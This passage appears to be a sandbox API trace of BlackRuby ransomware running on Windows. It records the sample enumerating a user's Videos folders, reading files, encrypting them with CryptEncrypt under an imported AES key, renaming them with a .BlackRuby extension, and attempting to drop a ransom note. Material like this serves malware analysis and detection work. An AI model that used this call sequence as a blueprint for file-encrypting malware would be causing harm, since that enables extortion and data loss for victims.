ftLastAccessTime.dwLowDateTime=0xb14a3290, ftLastAccessTime.dwHighDateTime=0x1d3521f, ftLastWriteTime.dwLowDateTime=0xb14a3290, ftLastWriteTime.dwHighDateTime=0x1d3521f, nFileSizeHigh=0x0, nFileSizeLow=0x12ed1)) returned 1 [0062.196] GetLastError () returned 0x0 [0062.196] SetErrorMode (uMode=0x0) returned 0x1 [0062.196] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c708) returned 1 [0062.196] GetLastError () returned 0x0 [0062.234] CryptImportKey (in: hProv=0x37c708, pbData=0x1b6cda4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ea0) returned 1 [0062.234] GetLastError () returned 0x0 [0062.234] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.234] GetLastError () returned 0x0 [0062.239] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.239] GetLastError () returned 0x0 [0062.239] CryptDuplicateKey (in: hKey=0x360ea0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360de0) returned 1 [0062.239] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.239] GetLastError () returned 0x0 [0062.239] CryptSetKeyParam (hKey=0x360de0, dwParam=0x4, pbData=0x1b99df0*=0x1, dwFlags=0x0) returned 1 [0062.239] GetLastError () returned 0x0 [0062.239] CryptSetKeyParam (hKey=0x360de0, dwParam=0x1, pbData=0x1b99dbc, dwFlags=0x0) returned 1 [0062.239] GetLastError () returned 0x0 [0062.240] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b99e38*, pdwDataLen=0x18ed08*=0x12fd0, dwBufLen=0x12fd0 | out: pbData=0x1b99e38*, pdwDataLen=0x18ed08*=0x12fd0) returned 1 [0062.240] GetLastError () returned 0x0 [0062.240] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bbfe04*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1bbfe04*, pdwDataLen=0x18ed20*=0x10) returned 1 [0062.240] GetLastError () returned 0x0 [0062.240] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bbfe34*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1bbfe34*, pdwDataLen=0x18ed28*=0x10) returned 1 [0062.240] GetLastError () returned 0x0 [0062.241] CryptDestroyKey (hKey=0x360ea0) returned 1 [0062.241] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.241] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.241] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Vd7EuUJ4 p.avi", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Vd7EuUJ4 p.avi", lpFilePart=0x0) returned 0x36 [0062.241] GetLastError () returned 0x0 [0062.241] SetErrorMode (uMode=0x1) returned 0x0 [0062.241] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Vd7EuUJ4 p.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\vd7euuj4 p.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.242] GetLastError () returned 0xb7 [0062.242] GetFileType (hFile=0x258) returned 0x1 [0062.242] SetErrorMode (uMode=0x0) returned 0x1 [0062.242] GetFileType (hFile=0x258) returned 0x1 [0062.244] CloseHandle (hObject=0x258) returned 1 [0062.244] GetLastError () returned 0xb7 [0062.244] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Vd7EuUJ4 p.avi", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Vd7EuUJ4 p.avi", lpFilePart=0x0) returned 0x36 [0062.244] GetLastError () returned 0xb7 [0062.244] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Encrypted_f4b0O2lWzVUtMjBNKM2lniKvbcJll1e3l8KJkkG6R6.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Encrypted_f4b0O2lWzVUtMjBNKM2lniKvbcJll1e3l8KJkkG6R6.BlackRuby", lpFilePart=0x0) returned 0x66 [0062.244] GetLastError () returned 0xb7 [0062.244] SetErrorMode (uMode=0x1) returned 0x0 [0062.244] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Vd7EuUJ4 p.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\vd7euuj4 p.avi"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99262310, ftCreationTime.dwHighDateTime=0x1d3530d, ftLastAccessTime.dwLowDateTime=0xb14a3290, ftLastAccessTime.dwHighDateTime=0x1d3521f, ftLastWriteTime.dwLowDateTime=0x2d4a7e40, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x12fe0)) returned 1 [0062.244] GetLastError () returned 0xb7 [0062.244] SetErrorMode (uMode=0x0) returned 0x1 [0062.244] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Vd7EuUJ4 p.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\vd7euuj4 p.avi"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\Encrypted_f4b0O2lWzVUtMjBNKM2lniKvbcJll1e3l8KJkkG6R6.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\encrypted_f4b0o2lwzvutmjbnkm2lnikvbcjll1e3l8kjkkg6r6.blackruby")) returned 1 [0062.245] GetLastError () returned 0xb7 [0062.245] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x40 [0062.245] GetLastError () returned 0xb7 [0062.245] SetErrorMode (uMode=0x1) returned 0x0 [0062.245] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0062.246] GetLastError () returned 0x5 [0062.246] SetErrorMode (uMode=0x0) returned 0x1 [0062.247] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\ZSES17", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\ZSES17", lpFilePart=0x0) returned 0x2e [0062.247] GetLastError () returned 0x5 [0062.247] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0062.247] GetLastError () returned 0x5 [0062.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0062.247] GetLastError () returned 0x5 [0062.247] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\ZSES17", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\ZSES17", lpFilePart=0x0) returned 0x2e [0062.247] GetLastError () returned 0x5 [0062.247] SetErrorMode (uMode=0x1) returned 0x0 [0062.247] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\ZSES17\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ea0 [0062.247] GetLastError () returned 0x5 [0062.247] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.247] GetLastError () returned 0x5 [0062.247] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0062.248] GetLastError () returned 0x12 [0062.248] FindClose (in: hFindFile=0x360ea0 | out: hFindFile=0x360ea0) returned 1 [0062.248] SetErrorMode (uMode=0x0) returned 0x1 [0062.248] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\ZSES17", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\ZSES17", lpFilePart=0x0) returned 0x2e [0062.248] GetLastError () returned 0x12 [0062.248] SetErrorMode (uMode=0x1) returned 0x0 [0062.248] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\ZSES17\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ea0 [0062.248] GetLastError () returned 0x12 [0062.248] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.248] GetLastError () returned 0x12 [0062.248] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0062.248] GetLastError () returned 0x12 [0062.248] FindClose (in: hFindFile=0x360ea0 | out: hFindFile=0x360ea0) returned 1 [0062.248] SetErrorMode (uMode=0x0) returned 0x1 [0062.248] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw", lpFilePart=0x0) returned 0x3c [0062.248] GetLastError () returned 0x12 [0062.249] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0062.249] GetLastError () returned 0x12 [0062.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0062.249] GetLastError () returned 0x12 [0062.249] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw", lpFilePart=0x0) returned 0x3c [0062.249] GetLastError () returned 0x12 [0062.249] SetErrorMode (uMode=0x1) returned 0x0 [0062.249] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ea0 [0062.249] GetLastError () returned 0x12 [0062.249] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.249] GetLastError () returned 0x12 [0062.249] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.249] GetLastError () returned 0x12 [0062.249] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.249] GetLastError () returned 0x12 [0062.249] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.249] GetLastError () returned 0x12 [0062.250] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.250] GetLastError () returned 0x12 [0062.250] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.250] GetLastError () returned 0x12 [0062.250] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.250] GetLastError () returned 0x12 [0062.250] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.250] GetLastError () returned 0x12 [0062.250] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.250] GetLastError () returned 0x12 [0062.250] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.250] GetLastError () returned 0x12 [0062.250] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.250] GetLastError () returned 0x12 [0062.251] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.251] GetLastError () returned 0x12 [0062.251] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.251] GetLastError () returned 0x12 [0062.251] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.251] GetLastError () returned 0x12 [0062.251] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0062.251] GetLastError () returned 0x12 [0062.251] FindClose (in: hFindFile=0x360ea0 | out: hFindFile=0x360ea0) returned 1 [0062.251] SetErrorMode (uMode=0x0) returned 0x1 [0062.251] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw", lpFilePart=0x0) returned 0x3c [0062.251] GetLastError () returned 0x12 [0062.251] SetErrorMode (uMode=0x1) returned 0x0 [0062.251] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ea0 [0062.251] GetLastError () returned 0x12 [0062.252] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.252] GetLastError () returned 0x12 [0062.252] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.252] GetLastError () returned 0x12 [0062.252] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.252] GetLastError () returned 0x12 [0062.252] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.252] GetLastError () returned 0x12 [0062.252] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.252] GetLastError () returned 0x12 [0062.252] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.252] GetLastError () returned 0x12 [0062.252] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.252] GetLastError () returned 0x12 [0062.253] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.253] GetLastError () returned 0x12 [0062.253] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.253] GetLastError () returned 0x12 [0062.253] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.253] GetLastError () returned 0x12 [0062.253] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.253] GetLastError () returned 0x12 [0062.253] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.253] GetLastError () returned 0x12 [0062.253] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.253] GetLastError () returned 0x12 [0062.253] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.253] GetLastError () returned 0x12 [0062.254] FindNextFileW (in: hFindFile=0x360ea0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0062.254] GetLastError () returned 0x12 [0062.254] FindClose (in: hFindFile=0x360ea0 | out: hFindFile=0x360ea0) returned 1 [0062.254] SetErrorMode (uMode=0x0) returned 0x1 [0062.254] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ASlHJP92O6kGBd067Xgs.avi", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ASlHJP92O6kGBd067Xgs.avi", lpFilePart=0x0) returned 0x55 [0062.254] GetLastError () returned 0x12 [0062.254] SetErrorMode (uMode=0x1) returned 0x0 [0062.254] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ASlHJP92O6kGBd067Xgs.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\aslhjp92o6kgbd067xgs.avi"), fInfoLevelId=0x0, lpFileInformation=0x1bf3b6c | out: lpFileInformation=0x1bf3b6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6239670, ftCreationTime.dwHighDateTime=0x1d358a2, ftLastAccessTime.dwLowDateTime=0x90fde310, ftLastAccessTime.dwHighDateTime=0x1d359ef, ftLastWriteTime.dwLowDateTime=0x90fde310, ftLastWriteTime.dwHighDateTime=0x1d359ef, nFileSizeHigh=0x0, nFileSizeLow=0x147b8)) returned 1 [0062.254] GetLastError () returned 0x12 [0062.254] SetErrorMode (uMode=0x0) returned 0x1 [0062.254] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ASlHJP92O6kGBd067Xgs.avi", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ASlHJP92O6kGBd067Xgs.avi", lpFilePart=0x0) returned 0x55 [0062.254] GetLastError () returned 0x12 [0062.254] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ASlHJP92O6kGBd067Xgs.avi", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ASlHJP92O6kGBd067Xgs.avi", lpFilePart=0x0) returned 0x55 [0062.254] GetLastError () returned 0x12 [0062.254] SetErrorMode (uMode=0x1) returned 0x0 [0062.254] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ASlHJP92O6kGBd067Xgs.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\aslhjp92o6kgbd067xgs.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.255] GetLastError () returned 0x0 [0062.255] GetFileType (hFile=0x258) returned 0x1 [0062.255] SetErrorMode (uMode=0x0) returned 0x1 [0062.255] GetFileType (hFile=0x258) returned 0x1 [0062.255] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x147b8 [0062.255] GetLastError () returned 0x0 [0062.255] ReadFile (in: hFile=0x258, lpBuffer=0x1bf5e40, nNumberOfBytesToRead=0x147b8, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1bf5e40*, lpNumberOfBytesRead=0x18ecac*=0x147b8, lpOverlapped=0x0) returned 1 [0062.256] GetLastError () returned 0x0 [0062.256] CloseHandle (hObject=0x258) returned 1 [0062.256] GetLastError () returned 0x0 [0062.256] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ASlHJP92O6kGBd067Xgs.avi", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ASlHJP92O6kGBd067Xgs.avi", lpFilePart=0x0) returned 0x55 [0062.256] GetLastError () returned 0x0 [0062.256] SetErrorMode (uMode=0x1) returned 0x0 [0062.256] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ASlHJP92O6kGBd067Xgs.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\aslhjp92o6kgbd067xgs.avi"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6239670, ftCreationTime.dwHighDateTime=0x1d358a2, ftLastAccessTime.dwLowDateTime=0x90fde310, ftLastAccessTime.dwHighDateTime=0x1d359ef, ftLastWriteTime.dwLowDateTime=0x90fde310, ftLastWriteTime.dwHighDateTime=0x1d359ef, nFileSizeHigh=0x0, nFileSizeLow=0x147b8)) returned 1 [0062.256] GetLastError () returned 0x0 [0062.256] SetErrorMode (uMode=0x0) returned 0x1 [0062.256] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c680) returned 1 [0062.256] GetLastError () returned 0x0 [0062.289] CryptImportKey (in: hProv=0x37c680, pbData=0x1c791c8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360d60) returned 1 [0062.289] GetLastError () returned 0x0 [0062.289] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.289] GetLastError () returned 0x0 [0062.294] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.294] GetLastError () returned 0x0 [0062.294] CryptDuplicateKey (in: hKey=0x360d60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360d20) returned 1 [0062.294] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.294] GetLastError () returned 0x0 [0062.294] CryptSetKeyParam (hKey=0x360d20, dwParam=0x4, pbData=0x1ca6214*=0x1, dwFlags=0x0) returned 1 [0062.294] GetLastError () returned 0x0 [0062.294] CryptSetKeyParam (hKey=0x360d20, dwParam=0x1, pbData=0x1ca61e0, dwFlags=0x0) returned 1 [0062.294] GetLastError () returned 0x0 [0062.294] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ca625c*, pdwDataLen=0x18ec9c*=0x148b0, dwBufLen=0x148b0 | out: pbData=0x1ca625c*, pdwDataLen=0x18ec9c*=0x148b0) returned 1 [0062.295] GetLastError () returned 0x0 [0062.295] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ccf3e8*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1ccf3e8*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0062.295] GetLastError () returned 0x0 [0062.295] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ccf418*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1ccf418*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0062.295] GetLastError () returned 0x0 [0062.295] CryptDestroyKey (hKey=0x360d60) returned 1 [0062.295] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.295] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.295] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ASlHJP92O6kGBd067Xgs.avi", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ASlHJP92O6kGBd067Xgs.avi", lpFilePart=0x0) returned 0x55 [0062.295] GetLastError () returned 0x0 [0062.295] SetErrorMode (uMode=0x1) returned 0x0 [0062.295] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ASlHJP92O6kGBd067Xgs.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\aslhjp92o6kgbd067xgs.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.297] GetLastError () returned 0xb7 [0062.297] GetFileType (hFile=0x258) returned 0x1 [0062.297] SetErrorMode (uMode=0x0) returned 0x1 [0062.297] GetFileType (hFile=0x258) returned 0x1 [0062.299] CloseHandle (hObject=0x258) returned 1 [0062.299] GetLastError () returned 0xb7 [0062.299] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ASlHJP92O6kGBd067Xgs.avi", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ASlHJP92O6kGBd067Xgs.avi", lpFilePart=0x0) returned 0x55 [0062.299] GetLastError () returned 0xb7 [0062.299] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_rOp9aorCqBtVc9tRl4311By1TvjthtyxJl2fzMTgfZJORxZ.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_rOp9aorCqBtVc9tRl4311By1TvjthtyxJl2fzMTgfZJORxZ.BlackRuby", lpFilePart=0x0) returned 0x80 [0062.299] GetLastError () returned 0xb7 [0062.299] SetErrorMode (uMode=0x1) returned 0x0 [0062.299] GetFileAttributesExW (in: 